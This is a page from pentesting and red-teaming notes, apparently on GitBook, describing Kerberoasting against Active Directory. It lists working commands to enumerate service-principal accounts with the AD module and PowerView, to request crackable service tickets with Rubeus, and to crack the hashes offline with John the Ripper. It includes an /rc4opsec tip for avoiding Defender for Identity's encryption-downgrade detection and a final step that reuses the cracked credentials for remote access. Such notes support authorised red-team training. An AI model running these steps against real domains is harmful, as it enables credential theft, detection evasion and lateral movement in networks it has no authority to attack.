Pentesting and Red Teaming Notes
  • 🖥️Pentesting and Red Teaming Cheatsheet
  • Web Application Pentesting(BlackBox)
    • SQL Injection
    • Blind SQL Injection
    • Path Traversal
    • Attacking Authentication
    • Race Conditions
    • Business Logic Vulnerabilities
    • Command Injections
    • Information disclosure
    • Access Controls
    • File upload Attacks
    • XXE
    • Server Side Request Forgery
    • Api Testing
    • noSQL
    • DOM based vulnerabilities
    • Cross Site scripting
  • Infrastructure Pentesting
    • Windows Privilege Escalation
    • Attacking Active Directory
    • File Transfers and Download
    • Pivoting(Tunneling and Port Forwarding)
    • Linux Privilege Escalation
    • Stealing NTLM hashes
    • Tricks and Tips
  • Active Directory Pentesting
    • powershell theory
    • Methodology
    • domain enumeration
    • File Transfer
    • PowerShell ADModule
    • Local Privilege Escalation
    • PowerView Commands
    • ACLs Descriptions
    • ACLs Abuse
    • ACL
    • Trusts
    • User Hunting
    • group policy
    • Mimikatz
    • BloodHound
    • LateralMovement
    • Kerberoasting
    • defense bypasses
    • Set-SPN
    • ASREProasting
    • Unconstrained Delegation
    • Constrained Delegation
    • Resource Based Constrained Delegation
    • AD CS
    • Persistance
    • Priv Esc Trusts Inside Forest
    • MSSQL Servers
    • Priv Esc Trusts Across Forest
    • Tips And Tricks
    • Service Tickets and Abuses
  • Reconnaissance
    • Web Application Reconnaissance
    • External Reconnaissance
Powered by GitBook
On this page
  • Kerberoasting
  • Find user accounts used as Service accounts
  1. Active Directory Pentesting

Kerberoasting

Kerberoasting

It is an attack against service accounts. Since the service tickets are encrypted with ntlm hash of service account and any domain user is able to request service ticket for any service on the machine, in this attack we request service ticket from the Ticket Granting Server in the DC and extract the ntlm hash of that service by bruteforcing with hashcat or john offline. Here we always target user accounts that are used as service accounts because regular service account passwords are generated by DC and quiet random and hard to bruteforce and also are changed frequenly automatically.

Find user accounts used as Service accounts

  • Using AD module

Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

  • Using PowerView

Get-DomainUser -SPN

  • Using rubeus to list kerberoast stats

Rubeus.exe kerberoast /stats

  • Use Rubeus to request a ST

Rubeus.exe kerberoast /user:svcadmin /simple /rc4opsec /outfile:C:\AD\Tools\hashes.txt

  • To avoid detections based on Encryption Downgrade for Kerberos EType(used by likes of MDI -0x17 stands for rc4-hmac), look for Kerberoastableaccounts that only support RC4_HMAC

Rubeus.exe kerberoast /stats /rc4opsec 
Rubeus.exe kerberoast /user:svcadmin /simple /rc4opsec

  • Kerberoast all possible accounts

Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt

  • Crack the ticket using john the ripper

john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\hashes.txt

  • After this create powershell credential object and use Enter-PSSession to access the computer where the user has admin rights or is able to access.

PreviousLateralMovementNextdefense bypasses

Last updated 10 months ago